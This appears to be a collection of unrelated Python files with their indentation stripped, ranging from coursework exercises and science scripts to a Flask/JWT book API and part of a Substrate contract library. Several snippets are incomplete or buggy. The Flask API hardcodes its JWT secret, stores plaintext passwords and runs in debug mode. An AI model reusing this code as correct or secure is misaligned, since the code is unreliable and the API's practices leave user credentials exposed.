for order in orderData:
artNr_wo = order[3][:-4]
wo_pdf = str(order[0])
foundPair = False
# Create PdfFileMerger()
pdfMerger = PyPDF2.PdfFileMerger()
while foundPair == False:
for key in drawingData:
keyStr = key[:-4]
counter = 0
if len(artNr_wo) <= len(keyStr):
for i in range(len(artNr_wo)):
if artNr_wo[i] == keyStr[i]:
counter += 1
else:
for i in range(len(keyStr)):
if keyStr[i] == artNr_wo[i]:
counter += 1
if counter > len(artNr_wo) * match:
pdfMerger.append(PyPDF2.PdfFileReader(open(wo_pdf, 'rb')))
pdfMerger.append(PyPDF2.PdfFileReader(open(drawingData[key], 'rb')))
pdfMerger.write(wo_pdf)
foundPair = True
# FOR DEBUGGING ONLY
# currentTime = datetime.now()
# Time formatting
time_delta = currentTime - lastTime
# finish string
finish_string = f'Program executed in {time_delta} seconds. \n{count} drawings combined'
return finish_string
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-11-13 02:17
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('project', '0006_auto_20181113_0914'),
]
operations = [
migrations.RemoveField(
model_name='project',
name='project_status',
),
]
|
"""setup.py for cryptarchive"""
from setuptools import setup
setup(
name="cryptarchive",
version="0.1.6",
author="bennr01",
author_email="benjamin99.vogt@web.de",
description="encrypted storage server and client",
long_description=open("README.md").read(),
license="AGPLv3",
keywords="crypto server data storage network CLI",
url="https://github.com/bennr01/cryptarchive/",
classifiers=[
"License :: OSI Approved :: GNU Affero General Public License v3",
"Topic :: Security :: Cryptography",
"Programming Language :: Python",
"Development Status :: 3 - Alpha",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
],
packages=[
"cryptarchive",
],
install_requires=[
"twisted",
"pycryptodome",
"zope.interface",
],
entry_points={
"console_scripts": [
"cryptarchive-server=cryptarchive.runner:server_main",
"cryptarchive-client=cryptarchive.runner:client_main",
],
}
)
|
import re
import os
## setting working directory ------------------------------------------------
os.chdir("C:/Users/wooki/Documents/GitHub/pythoncourse2018/day06")
# open text file of 2008 NH primary Obama speech
with open("obama-nh.txt", "r") as f:
text = f.readlines()
## TODO: print lines that do not contain 'the' using what we learned
## (although you ~might~ think you could do something like
## [l for l in obama if "the" not in l]
key=re.compile(r"\b[Tt]he\b")
key=re.compile(r"\bThe|the\b")
keyword = re.compile(r"\sthe\s")
keyword2 = re.compile(r"The\w+")
l=[]
for line in (text):
if keyword.search(line) or keyword2.search(line):
the = line
else:
nothe = line
print nothe
l.append(nothe)
len(l)
# TODO: print lines that contain a word of any length starting with s and ending with e
text2= [x.lower() for x in text]
key= re.compile(r"\bs[a-z]*e\b")
find=[]
for line in text2:
if key.search(line):
find.append(line)
find
len(find)
## TODO: Print the date input in the following format
## Month: MM
## Day: DD
## Year: YY
date = raw_input("Please enter a date in the format MM.DD.YY: ")
Month = re.compile(r"\d{1,2}/\d{1,2}")
Day = re.compile(r"\d{1,2}/\d{1,2}")
Year = re.compile(r"\d{1,2}/\d{1,2}")
date =raw_input("Please enter a date in the format MM.DD.YY: ") |
# author: Christopher Koch
# date: 05/18/2015
# file: Nussinov.py
#
# topic: RNA, Bioinformatics, dynamic programming, recursion
# decription: the nussinov-algorithm was invented by Ruth Nussinov and it is used to predict RNA secondary structure.
def comparable(a, b):
if a == 'A' and b == 'U':
return 1
if a == 'U' and b == 'A':
return 1
if a == 'C' and b == 'G':
return 1
if a == 'G' and b == 'C':
return 1
return 0
def printMatrix(s, m):
print '\t\t',
for i in range(0, len(m)-1):
print '\t' + s[i],
print
for i in range(1, len(m[0])):
print '\t' + str(i),
for j in range(len(m[i])):
print '\t' + str(m[i][j]),
print '\t' + s[i-1]
print '\t',
for i in range(0, len(m)):
print '\t' + str(i),
print
print
def createMatrix(s):
m = []
for i in range(len(s)+1):
row = []
for j in range(len(s)+1):
row.append(' ')
m.append(row)
return m
def initMatrix(m_p):
m = m_p
for i in range(len(m)):
m[i][i] = 0
m[i][i-1] = 0
return m
def calculateMatrix(m_p, m_l):
m = m_p
c = 0
for x in range(1, len(m)):
for y in range(1, len(m)):
i = y
j = y + c
if j > len(m)-1:
break
a = m[i][j-1]
b = 0
for k in range(i, j-m_l):
# sub 1 because the real indexes of _s starts with 0
if(comparable(_s[k-1], _s[j-1])):
b = max(b, m[i][k-1] + m[k+1][j-1] + 1)
m[i][j] = max(a, b)
c += 1
return m
def traceback(s, m, i, j, t, m_l):
if j == i:
return t
elif m[i][j] == m[i][j-1]:
traceback(s, m, i, j-1, t, m_l)
return t
else:
for k in range(i, j-m_l):
if(comparable(s[k-1], s[j-1])):
if m[i][j] == m[i][k-1] + m[k+1][j-1] + 1:
t.append([k, j])
traceback(s, m, i, k-1, t, m_l)
traceback(s, m, k+1, j-1, t, m_l)
return t
def printStructure(s, t):
print '\t\t',
for i in range(1, len(s)+1):
print '\t' + str(s[i-1]),
print
print '\t\t',
for i in range(1, len(s)+1):
a = '\t.'
for j in range(len(t)):
if i == t[j][0]:
a = '\t('
elif i == t[j][1]:
a = '\t)'
print a,
def nussinov(s, m_l):
# create matrix
m = createMatrix(s)
# init matrix
m = initMatrix(m)
# calculate matrix
m = calculateMatrix(m, m_l)
# print matrix
printMatrix(s, m)
# traceback
t = traceback(s, m, 1, len(m)-1, [], m_l)
# printStructure
printStructure(s, t)
_s = "GCACGACG"
nussinov(_s, 0)
|
#!/usr/bin/python
import numpy as np
import pylab as py
from scipy import integrate
from COMMON import nanosec,yr,week,grav,msun,light,mpc,hub0,h0,omm,omv,kpc,mchirpfun,fmaxlso
#I will plot the formulas from DrozEtAl1999 with redshift, and see if the extra terms in the stationary phase approximation explain the amplification for pulsar timing.
#Input parameters:
redsi=1.
#PTAs:
fmin=1./(10.*yr)
fbin=fmin*0.1
fmax=10**(-7)
mchi=10**(10.)*(1.+redsi) #Redshifted chirp mass, in solar masses.
'''
#GBDs:
fmin=10.
fmax=1000.
fbin=0.1
mchi=2*(1.+redsi) #Redshifted chirp mass, in solar masses.
'''
phic=0.
minreds=1e-3 #Minimum redshift considered.
maxreds=1e2 #Maximum redshift considered.
zbin=1000 #Number of z-bins.
#-----------------------------------------------------------------
#Deriving some quantities.
#-----------------------------------------------------------------
#Defining some functions.
def ht(Qang, mch, dist, f, fmin, fmax, phi):
''''''
return ht_spa(Qang, mch, dist, f, phi)*(1.+daw(mch, f, fmin, fmax))*np.cos(dphi(mch, f)+dphiw(mch, f, fmin, fmax))
def ht_spa(Qang, mch, dist, f, phi):
'''Amplitude of the GW strain in the frequency domain (h tilde), under the stationary phase approximation.'''
return np.sqrt(30.*np.pi)/24.*Qang*(grav*msun*mch)**2./(dist*mpc*light**(3./2.)*vorb(mch, f)**(7./2.))*np.cos(phi)
def Qang():
'''Function of the angles mentioned in the paper.'''
return 1.#+++I have to find out the correct factor!
def vorb(mch, f):
''''''
return (np.pi*grav*msun*mch*f)**(1./3.)
def phi(tc, phic, mch, f):
''''''
return 2.*np.pi*f*tc-phic-np.pi/4.+3.*light**5./(128.*vorb(mch, f)**5.)
def daw(mch, f, fmin, fmax):
''''''
return -12./np.sqrt(30.*np.pi)*(vorb(mch, f)*1./light)**(7./2.)*( vorb(mch, fmin)**2.*light/(vorb(mch, f)**3.-vorb(mch, fmin)**3.)*np.cos(philim(mch, f, fmin)+np.pi/4.) + vorb(mch, fmax)**2.*light/(-vorb(mch, f)**3.+vorb(mch, fmax)**3.)*np.cos(philim(mch, f, fmax)+np.pi/4.) )
def philim(mch, f, flim):
''''''
return (5.*vorb(mch, f)**3.-8.*vorb(mch, flim)**3.)*light**5./(128.*vorb(mch, flim)**8.)+3.*light**5./(128.*vorb(mch, f)**5.)
def dphiw(mch, f, fmin, fmax):
''''''
return 12./np.sqrt(30.*np.pi)*(vorb(mch, f)*1./light)**(7./2.)*( vorb(mch, fmin)**2.*light/(vorb(mch, f)**3.-vorb(mch, fmin)**3.)*np.sin(philim(mch, f, fmin)+np.pi/4.) + vorb(mch, fmax)**2.*light/(-vorb(mch, f)**3.+vorb(mch, fmax)**3.)*np.sin(philim(mch, f, fmax)+np.pi/4.))
def dphi(mch, f):
''''''
return 92./45.*vorb(mch, f)**5.
def tcoal(mch, f):
''''''
m1=2**(1./5.)
m2=m1
fcoal=fmaxlso(m1, m2)
cons=96./5.*np.pi**(8./3.)*(grav*msun*mch)**(5./3.)/(light**5.)
return 3./(8.*cons)*(f**(-8./3.)-fcoal**(-8./3.))
#In principle I will just take a look at the amplitude:
def ht_amp(Qang, mch, dist, f, fmin, fmax):
''''''
return ht_spa_amp(Qang, mch, dist, f)*(1.+daw(mch, f, fmin, fmax))
def ht_spa_amp(Qang, mch, dist, f):
'''Amplitude of the GW strain in the frequency domain (h tilde), under the stationary phase approximation.'''
return np.sqrt(30.*np.pi)/24.*Qang*(grav*msun*mch)**2./(dist*mpc*light**(3./2.)*vorb(mch, f)**(7./2.))
#-----------------------------------------------------------------
#Creating a vector of redshift and a vector of luminosity and comoving distance.
reds=np.logspace(np.log10(minreds),np.log10(maxreds),zbin) #Vector of redshifts logarithmically spaced.
lumdistvec=np.zeros(len(reds)) #This will be D_L(z), the luminosity distance, in Mpc.
comdistvec=np.zeros(len(reds)) #This will be r(z), the comoving distance, in Mpc.
dist_const=light/(hub0*h0)/mpc #A constant that multiplies distances.
for zi in xrange(len(reds)):
comdistvec[zi]=integrate.quad(lambda z: (omm*(1.+z)**3.+omv)**(-0.5),0,reds[zi])[0]*dist_const
lumdistvec[zi]=(1.+reds[zi])*comdistvec[zi]
lumdisti=lumdistvec[abs(reds-redsi).argmin()] #Luminosity distance corresponding to the chosen redshift of the binary.
comdisti=comdistvec[abs(reds-redsi).argmin()] #Comoving distance corresponding to the chosen redshift of the binary.
#-----------------------------------------------------------------
#Create a vector of frequencies and strains.
fvec=np.arange(fmin, fmax, fbin)
phivec=phi(tcoal(mchi, fvec), phic, mchi, fvec)
#hvec=ht(Qang(), mchi, lumdisti, fvec, fmin, fmax, phivec)
#hvec=ht_spa(Qang(), mchi, lumdisti, fvec, phivec)
hvec=ht_amp(Qang(), mchi, lumdisti, fvec, fmin, fmax)
hvec_spa=ht_spa_amp(Qang(), mchi, lumdisti, fvec)
py.ion()
py.loglog(fvec, hvec)
py.loglog(fvec, hvec_spa)
#py.show()
|
from flask import Flask,request,jsonify
import json
import sqlite3
from flask_jwt_extended import create_access_token
from flask_jwt_extended import get_jwt_identity
from flask_jwt_extended import jwt_required
from flask_jwt_extended import JWTManager
app = Flask(__name__)
app.config["JWT_SECRET_KEY"] = "maxmaxmaxsupermaxmaxmaxsupermaxmaxmaxsuperupermaxmaxmaxmax"
jwt = JWTManager(app)
def db_connection():
try:
conn = sqlite3.connect('books.sqlite')
print("Connected")
except:
print("Failed")
return conn
@app.route("/login", methods=["POST"])
def login():
conn = db_connection()
cursor = conn.cursor()
request_username = request.json.get("username", None)
request_password = request.json.get("password", None)
cursor.execute("SELECT * FROM user WHERE username=?", (request_username,))
user = list(cursor.fetchone())
if user != [] and (user[1] != request_username or user[2] != request_password):
return jsonify({"msg": "Bad username or password"}), 401
access_token = create_access_token(identity=request_username)
return jsonify(access_token=access_token)
@app.route("/signup",methods=["POST"])
def signup():
conn = db_connection()
cursor = conn.cursor()
new_username = request.json.get("username", None)
new_password = request.json.get("password", None)
if new_username is not None and new_password is not None:
sql = """INSERT INTO user (username,password) VALUES (?,?)"""
cursor = cursor.execute(sql,(new_username,new_password))
conn.commit()
conn.close()
return "Sucess",201
return "Failed",401
@app.route("/books",methods=["GET","POST"])
@jwt_required()
def books():
conn = db_connection()
cursor = conn.cursor()
if request.method == "GET":
cursor = conn.execute("SELECT * FROM book")
books = [dict(id=row[0],author=row[1],title=row[2]) for row in cursor.fetchall()]
if books is not None:
return jsonify(books)
if request.method == "POST":
new_author = request.json.get("author", None)
new_title = request.json.get("title", None)
sql = """INSERT INTO book (author,title) VALUES (?,?)"""
cursor = cursor.execute(sql,(new_author,new_title))
conn.commit()
conn.close()
return "Sucess",201
@app.route("/book/<int:id>", methods=["GET", "PUT", "DELETE"])
@jwt_required()
def single_book(id):
conn = db_connection()
cursor = conn.cursor()
book = None
if request.method == "GET":
cursor.execute("SELECT id,author,title FROM book WHERE id=?", (id,))
row = cursor.fetchone()
dict = {"id":row[0],"author":row[1],"title":row[2]}
print(dict)
book = jsonify(dict)
if book is not None:
return book, 200
else:
return "Something wrong", 404
if request.method == "PUT":
sql = """UPDATE book
SET title=?,
author=?
WHERE id=? """
author = request.json.get("author", None)
title = request.json.get("title", None)
updated_book = {
"id": id,
"author": author,
"title": title
}
print(id)
conn.execute(sql, (title, author, id))
conn.commit()
return jsonify(updated_book)
if request.method == "DELETE":
sql = """ DELETE FROM book WHERE id=? """
conn.execute(sql, (id,))
conn.commit()
return "The book with id: {} has been deleted.".format(id), 200
@app.route("/protected", methods=["GET"])
@jwt_required()
def protected():
current_user = get_jwt_identity()
return jsonify(logged_in_as=current_user), 200
if __name__ == "__main__":
app.run(debug=True)
|
# Write a Python program to get the smallest number from a list
# def smallest(lisofnum):
# return min(lisofnum)
# listofnum = [1,2,3,4,5,6,7,8,9]
# output = smallest(listofnum)
# print(output)
print("-----------------------without inbuilt function -------------------------")
def smallestNum(listofNums):
for i in range(len(listofNums)-1):
if listofNums[i]>listofNums[i+1]:
listofNums[i] = listofNums[i+1]
else:
pass
def checkList(listoNums):
for i in range(len(listofNums)-1):
if listofNums[i]<listofNums[i+1]:
pass
else:
smallestNum(listofNums)
return listofNums[0]
listofNums = [7,4,2,-1,5,0]
smallestNum(listofNums)
output = checkList(listofNums)
print(output) |
# Python Substrate Interface Library
#
# Copyright 2018-2020 Stichting Polkascan (Polkascan Foundation).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from hashlib import blake2b
from typing import Optional
from .utils import version_tuple
from substrateinterface.exceptions import ExtrinsicFailedException, DeployContractFailedException, \
ContractReadFailedException, ContractMetadataParseException
from scalecodec.base import ScaleBytes, ScaleType
from scalecodec.types import GenericContractExecResult
from substrateinterface.base import SubstrateInterface, Keypair, ExtrinsicReceipt
__all__ = ['ContractExecutionReceipt', 'ContractMetadata', 'ContractCode', 'ContractInstance', 'ContractEvent']
class ContractMetadata:
def __init__(self, metadata_dict: dict, substrate: SubstrateInterface):
"""
Class using the generated metadata.json file to represent the metadata of a contract. The metadata_dict is
parsed and the used types are extracted, composed and added to the type registry of the runtime
Parameters
----------
metadata_dict
substrate
"""
self.metadata_version = None
self.metadata_dict = metadata_dict
self.substrate = substrate
self.type_registry = {}
self.__type_offset = 0
self.__parse_metadata()
@classmethod
def create_from_file(cls, metadata_file: str, substrate: SubstrateInterface) -> "ContractMetadata":
"""
Create a new ContractMetadata object using the provided metadata_file, usually generated by the command
"cargo +nightly contract generate-metadata" in an ink! project
Parameters
----------
metadata_file
substrate
Returns
-------
ContractMetadata
"""
with open(os.path.abspath(metadata_file), 'r') as fp:
metadata_string = fp.read()
return cls(json.loads(metadata_string), substrate)
def __getattr__(self, item):
if item in self.metadata_dict:
return self.metadata_dict[item]
else:
raise AttributeError("'{}' object has no attribute '{}'".format(self.__class__.__name__, item))
def __convert_to_latest_metadata(self):
# Determine version
if 'metadataVersion' in self.metadata_dict:
self.metadata_version = 0
elif 'V1' in self.metadata_dict:
self.metadata_version = 1
elif 'V2' in self.metadata_dict:
self.metadata_version = 2
elif 'V3' in self.metadata_dict:
self.metadata_version = 3
elif 'version' in self.metadata_dict:
self.metadata_version = int(self.metadata_dict['version'])
if self.metadata_version is None or self.metadata_version > 4:
raise ContractMetadataParseException("Unsupported metadata version")
if 1 <= self.metadata_version <= 3:
version_key = f"V{self.metadata_version}"
self.metadata_dict['spec'] = self.metadata_dict[version_key]['spec']
self.metadata_dict['storage'] = self.metadata_dict[version_key]['storage']
self.metadata_dict['types'] = self.metadata_dict[version_key]['types']
del self.metadata_dict[version_key]
# Version converters
# V1 -> V2: name becomes label; no longer array
if self.metadata_version <= 1:
def replace_name_with_label(obj):
if 'name' in obj:
if type(obj['name']) is list:
obj['label'] = '::'.join(obj.pop('name'))
else:
obj['label'] = obj.pop('name')
return obj
for section in ['constructors', 'events', 'messages']:
for idx, c in enumerate(self.metadata_dict['spec'][section]):
self.metadata_dict['spec'][section][idx]['args'] = [
replace_name_with_label(a) for a in c['args']
]
replace_name_with_label(c)
# V2 -> V3: new payable flags for constructors: default to true
if self.metadata_version <= 2:
for idx, c in enumerate(self.metadata_dict['spec']['constructors']):
c["payable"] = True
def __parse_metadata(self):
self.__convert_to_latest_metadata()
# Check requirements
if 'types' not in self.metadata_dict:
raise ContractMetadataParseException("No 'types' directive present in metadata file")
if 'spec' not in self.metadata_dict:
raise ContractMetadataParseException("'spec' directive not present in metadata file")
if 'constructors' not in self.metadata_dict['spec']:
raise ContractMetadataParseException("No constructors present in metadata file")
if 'messages' not in self.metadata_dict['spec']:
raise ContractMetadataParseException("No messages present in metadata file")
if 'source' not in self.metadata_dict:
raise ContractMetadataParseException("'source' directive not present in metadata file")
# check Metadata version
if 'V0' in self.metadata_dict and version_tuple(self.metadata_dict['metadataVersion']) < (0, 7, 0):
# Type indexes are 1-based before 0.7.0
self.__type_offset = 1
self.type_string_prefix = f"ink::{self.metadata_dict['source']['hash']}"
if self.metadata_version == 0:
for idx, metadata_type in enumerate(self.metadata_dict['types']):
idx += self.__type_offset
if idx not in self.type_registry:
self.type_registry[idx] = self.get_type_string_for_metadata_type(idx)
else:
self.substrate.init_runtime()
portable_registry = self.substrate.runtime_config.create_scale_object('PortableRegistry')
portable_registry.encode({"types": self.metadata_dict["types"]})
self.substrate.runtime_config.update_from_scale_info_types(
portable_registry['types'], prefix=self.type_string_prefix
)
def generate_constructor_data(self, name, args: dict = None) -> ScaleBytes:
"""
Compose the data field used in the "Contracts.instantiate" call, finding the selectors and encoded the args
of given constructor
Parameters
----------
name
args
Returns
-------
ScaleBytes
"""
if not args:
args = {}
for constructor in self.metadata_dict['spec']['constructors']:
if name == constructor['label']:
data = ScaleBytes(constructor['selector'])
for arg in constructor['args']:
if arg['label'] not in args:
raise ValueError(f"Argument \"{arg['label']}\" is missing")
else:
data += self.substrate.encode_scale(
type_string=self.get_type_string_for_metadata_type(arg['type']['type']),
value=args[arg['label']]
)
return data
raise ValueError(f'Constructor "{name}" not found')
def get_type_string_for_metadata_type(self, type_id: int) -> str:
"""
Adds a type included in the metadata (represented by an index in the type list) to the type registry and
produces a type string that can be used in the scope of the `RuntimeConfigurationObject`.
Parameters
----------
type_id 1-based index of type locating in the metadata types dict
Returns
-------
str
"""
if self.metadata_version >= 1:
if type_id > len(self.metadata_dict['types']):
raise ValueError(f'type_id {type_id} not found in metadata')
return f'{self.type_string_prefix}::{type_id}'
if self.metadata_version == 0:
# Legacy type parsing
# Check if already processed
if type_id in self.type_registry:
return self.type_registry[type_id]
if type_id > len(self.metadata_dict['types']):
raise ValueError(f'type_id {type_id} not found in metadata')
arg_type = self.metadata_dict['types'][type_id - 1]
if 'path' in arg_type:
# Option field
if arg_type['path'] == ['Option']:
# Examine the fields in the 'Some' variant
options_fields = arg_type['def']['variant']['variants'][1]['fields']
if len(options_fields) == 1:
sub_type = self.get_type_string_for_metadata_type(options_fields[0]['type'])
else:
raise NotImplementedError('Tuples in Option field not yet supported')
return f"Option<{sub_type}>"
# Predefined types defined in crate ink_env
if arg_type['path'][0:2] == ['ink_env', 'types']:
if arg_type['path'][2] == 'Timestamp':
return 'Moment'
elif arg_type['path'][2] in ['AccountId', 'Hash', 'Balance', 'BlockNumber']:
return arg_type['path'][2]
else:
raise NotImplementedError(f"Unsupported ink_env type '{arg_type['path'][2]}'")
# RUST primitives
if 'primitive' in arg_type['def']:
return arg_type['def']['primitive']
elif 'array' in arg_type['def']:
array_type = self.get_type_string_for_metadata_type(arg_type['def']['array']['type'])
# Generate unique type string
return f"[{array_type}; {arg_type['def']['array']['len']}]"
elif 'variant' in arg_type['def']:
# Create Enum
type_definition = {
"type": "enum",
"type_mapping": []
}
for variant in arg_type['def']['variant']['variants']:
if 'fields' in variant:
if len(variant['fields']) > 1:
raise NotImplementedError('Tuples as field of enums not supported')
enum_value = self.get_type_string_for_metadata_type(variant['fields'][0]['type'])
else:
enum_value = 'Null'
type_definition['type_mapping'].append(
[variant['name'], enum_value]
)
# Add to type registry
self.substrate.runtime_config.update_type_registry_types(
{f'{self.type_string_prefix}::{type_id}': type_definition}
)
# Generate unique type string
self.type_registry[type_id] = f'{self.type_string_prefix}::{type_id}'
return f'{self.type_string_prefix}::{type_id}'
elif 'composite' in arg_type['def']:
# Create Struct
type_definition = {
"type": "struct",
"type_mapping": []
}
for field in arg_type['def']['composite']['fields']:
type_definition['type_mapping'].append(
[field['name'], self.get_type_string_for_metadata_type(field['type'])]
)
# Add to type registry
self.substrate.runtime_config.update_type_registry_types(
{f'{self.type_string_prefix}::{type_id}': type_definition}
)
# Generate unique type string
self.type_registry[type_id] = f'{self.type_string_prefix}::{type_id}'
return f'{self.type_string_prefix}::{type_id}'
elif 'tuple' in arg_type['def']:
# Create tuple
elements = [self.get_type_string_for_metadata_type(element) for element in arg_type['def']['tuple']]
return f"({','.join(elements)})"
raise NotImplementedError(f"Type '{arg_type}' not supported")
def get_return_type_string_for_message(self, name) -> str:
for message in self.metadata_dict['spec']['messages']:
if name == message['label']:
if message['returnType'] is None:
return 'Null'
else:
return self.get_type_string_for_metadata_type(message['returnType']['type'])
raise ValueError(f'Message "{name}" not found')
def generate_message_data(self, name, args: dict = None) -> ScaleBytes:
"""
Compose the data field used in the "Contracts.call" call, finding the selector and encoded the args
of provided message name
Parameters
----------
name: name of message in contract
args: arguments required by message, in format: `{'name': value}`
Returns
-------
ScaleBytes
"""
if not args:
args = {}
for message in self.metadata_dict['spec']['messages']:
if name == message['label']:
data = ScaleBytes(message['selector'])
for arg in message['args']:
if arg['label'] not in args:
raise ValueError(f"Argument \"{arg['label']}\" is missing")
else:
data += self.substrate.encode_scale(
type_string=self.get_type_string_for_metadata_type(arg['type']['type']),
value=args[arg['label']]
)
return data
raise ValueError(f'Message "{name}" not found')
def get_event_data(self, event_id: int) -> dict:
"""
Looks up the event data for given 0-based event_id
Parameters
----------
event_id
Returns
-------
"""
if event_id > len(self.metadata_dict['spec']['events']):
raise ValueError(f'Event ID {event_id} not found')
return self.metadata_dict['spec']['events'][event_id]
class ContractEvent(ScaleType):
def __init__(self, *args, contract_metadata: ContractMetadata = None, **kwargs):
"""
ScaleType class containing information about a specific Contract Event, it decodes the "data" field in
the generic "Contracts.ContractExecution" event that is triggered after a successfull "Contracts.call" call.
"""
self.contract_metadata = contract_metadata
self.event_id = None
self.name = None
self.docs = None
self.args = []
super().__init__(*args, **kwargs)
def process(self):
self.event_id = self.process_type('u8').value
event_data = self.contract_metadata.get_event_data(self.event_id)
self.name = event_data['label']
self.docs = event_data['docs']
self.args = event_data['args']
for arg in self.args:
# Decode value of event arg with type_string registered in contract
arg_type_string = self.contract_metadata.get_type_string_for_metadata_type(arg['type']['type'])
arg['value'] = self.process_type(arg_type_string).value
return {
'name': self.name,
'docs': self.docs,
'args': self.args
}
def process_encode(self, value):
raise NotImplementedError()
class ContractExecutionReceipt(ExtrinsicReceipt):
def __init__(self, *args, **kwargs):
"""
Object extending the `ExtrinsicReceipt` containing more information about the result after submitting a
"Contracts.call" extrinsic.
Parameters
----------
args
kwargs
"""
self.__contract_events = None
self.contract_metadata = kwargs.pop('contract_metadata')
super(ContractExecutionReceipt, self).__init__(*args, **kwargs)
@classmethod
def create_from_extrinsic_receipt(cls, receipt: ExtrinsicReceipt,
contract_metadata: ContractMetadata) -> "ContractExecutionReceipt":
"""
Promotes a ExtrinsicReceipt object to a ContractExecutionReceipt. It uses the provided ContractMetadata to
decode "ContractExecution" events
Parameters
----------
receipt
contract_metadata
Returns
-------
ContractExecutionReceipt
"""
return cls(
substrate=receipt.substrate,
extrinsic_hash=receipt.extrinsic_hash,
block_hash=receipt.block_hash,
finalized=receipt.finalized,
contract_metadata=contract_metadata
)
def process_events(self):
super().process_events()
if self.triggered_events:
self.__contract_events = []
for event in self.triggered_events:
if self.substrate.implements_scaleinfo():
if event.value['module_id'] == 'Contracts' and event.value['event_id'] == 'ContractEmitted':
# Create contract event
contract_event_obj = ContractEvent(
data=ScaleBytes(event['event'][1][1]['data'].value_object),
runtime_config=self.substrate.runtime_config,
contract_metadata=self.contract_metadata
)
contract_event_obj.decode()
self.__contract_events.append(contract_event_obj)
else:
if event.event_module.name == 'Contracts' and event.event.name == 'ContractEmitted':
# Create contract event
contract_event_obj = ContractEvent(
data=ScaleBytes(event.params[1]['value']),
runtime_config=self.substrate.runtime_config,
contract_metadata=self.contract_metadata
)
contract_event_obj.decode()
self.__contract_events.append(contract_event_obj)
@property
def contract_events(self):
if self.__contract_events is None:
self.process_events()
return self.__contract_events
class ContractCode:
def __init__(self, code_hash: bytes = None, metadata: ContractMetadata = None, wasm_bytes: bytes = None,
substrate: SubstrateInterface = None):
"""
Object representing the blueprint of the contract, combining either the code hash and metadata of a contract, or
the WASM bytes and metadata
Parameters
----------
code_hash: code hash of an already uploaded contract WASM binary
metadata
wasm_bytes: WASM binary
substrate
"""
self.code_hash = code_hash
self.metadata = metadata
self.wasm_bytes = wasm_bytes
self.substrate = substrate
@classmethod
def create_from_contract_files(cls, wasm_file: str, metadata_file: str,
substrate: SubstrateInterface) -> "ContractCode":
"""
Create a ContractCode providing paths for the WASM binary file and metadata JSON file generated by the
ink! project
Parameters
----------
wasm_file
metadata_file
substrate
Returns
-------
ContractCode
"""
with open(os.path.abspath(wasm_file), 'rb') as fp:
wasm_bytes = fp.read()
code_hash = blake2b(wasm_bytes, digest_size=32).digest()
metadata = ContractMetadata.create_from_file(metadata_file, substrate=substrate)
return cls(code_hash=code_hash, metadata=metadata, wasm_bytes=wasm_bytes, substrate=substrate)
@classmethod
def create_from_code_hash(cls, code_hash: bytes, metadata_file: str,
substrate: SubstrateInterface) -> "ContractCode":
"""
Create a ContractCode providing an existing contract code hash and a path to the metadata JSON file
Parameters
----------
code_hash
metadata_file
substrate
Returns
-------
ContractCode
"""
metadata = ContractMetadata.create_from_file(metadata_file, substrate=substrate)
return cls(code_hash=code_hash, metadata=metadata, substrate=substrate)
def upload_wasm(self, keypair: Keypair, storage_deposit_limit: int = None) -> ExtrinsicReceipt:
"""
Created and submits an "Contracts.upload_code" extrinsic containing the WASM binary
Parameters
----------
keypair: Keypair used to sign the extrinsic
storage_deposit_limit:T he maximum amount of balance that can be charged to pay for the storage consumed
Returns
-------
ExtrinsicReceipt
"""
if not self.wasm_bytes:
raise ValueError("No WASM bytes to upload")
call_function = self.substrate.get_metadata_call_function('Contracts', 'upload_code')
if not call_function:
# Try to fall back on legacy `put_code`
call_function = self.substrate.get_metadata_call_function('Contracts', 'put_code')
if not call_function:
raise NotImplementedError("Couldn't find method in Contracts pallet to upload the WASM binary")
call = self.substrate.compose_call(
call_module="Contracts",
call_function=call_function.name,
call_params={
'code': '0x{}'.format(self.wasm_bytes.hex()),
'storage_deposit_limit': storage_deposit_limit
}
)
extrinsic = self.substrate.create_signed_extrinsic(call=call, keypair=keypair)
return self.substrate.submit_extrinsic(extrinsic, wait_for_inclusion=True)
def deploy(self, keypair: Keypair, constructor: str, args: dict = None, value: int = 0, gas_limit: dict = None,
deployment_salt: str = None, upload_code: bool = False, storage_deposit_limit: int = None
) -> "ContractInstance":
"""
Deploys a new instance of the contract after it has been uploaded on-chain, with provided constructor and
constructor arguments
Parameters
----------
keypair
constructor: name of the constructor to use, provided in the metadata
args: arguments for the constructor
value: Value sent to created contract address
gas_limit: Gas limit as WeightV2 type. Will default to {'ref_time': 25990000000, 'proof_size': 11990383647911208550}.
deployment_salt: optional string or hex-string that acts as a salt for this deployment
upload_code: When True the WASM blob itself will be uploaded with the deploy, False if the WASM is already present on-chain
storage_deposit_limit: The maximum amount of balance that can be charged to pay for the storage consumed.
Returns
-------
ContractInstance
"""
# Lookup constructor
data = self.metadata.generate_constructor_data(name=constructor, args=args)
if gas_limit is None:
gas_limit = {'ref_time': 25990000000, 'proof_size': 11990383647911208550}
if upload_code is True:
if not self.wasm_bytes:
raise ValueError("No WASM bytes to upload")
call = self.substrate.compose_call(
call_module='Contracts',
call_function='instantiate_with_code',
call_params={
'value': value,
'gas_limit': gas_limit,
'storage_deposit_limit': storage_deposit_limit,
'code': '0x{}'.format(self.wasm_bytes.hex()),
'data': data.to_hex(),
'salt': deployment_salt or ''
}
)
else:
call = self.substrate.compose_call(
call_module='Contracts',
call_function='instantiate',
call_params={
'value': value,
'gas_limit': gas_limit,
'storage_deposit_limit': storage_deposit_limit,
'code_hash': f'0x{self.code_hash.hex()}',
'data': data.to_hex(),
'salt': deployment_salt or ''
}
)
extrinsic = self.substrate.create_signed_extrinsic(call=call, keypair=keypair)
result = self.substrate.submit_extrinsic(extrinsic, wait_for_inclusion=True)
if not result.is_success:
raise ExtrinsicFailedException(result.error_message)
for event in result.triggered_events:
if self.substrate.implements_scaleinfo():
if event.value['event']['event_id'] == 'Instantiated':
return ContractInstance(
contract_address=event.value['event']['attributes']['contract'],
metadata=self.metadata,
substrate=self.substrate
)
else:
if event.event.name == 'Instantiated':
return ContractInstance(
contract_address=event.params[1]['value'],
metadata=self.metadata,
substrate=self.substrate
)
raise DeployContractFailedException()
class ContractInstance:
